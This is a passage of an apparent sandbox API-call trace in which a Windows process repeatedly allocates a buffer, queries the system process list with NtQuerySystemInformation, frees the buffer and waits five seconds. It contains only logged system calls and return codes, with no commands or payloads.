RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.902] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.905] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.905] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.905] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.909] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.910] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.910] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.917] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.917] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.922] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.925] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.936] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.936] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.939] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.944] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.951] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.952] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.959] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.963] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.963] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.969] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.972] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.978] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.987] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.988] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0271.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0271.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0271.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0271.997] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0271.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0271.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0271.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.000] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.001] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.007] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.021] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.021] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.027] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.030] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.030] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.052] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.055] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.055] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.061] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.064] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.069] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.070] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.071] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0272.071] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0272.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0272.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0272.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0272.076] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0272.078] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0272.078] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, 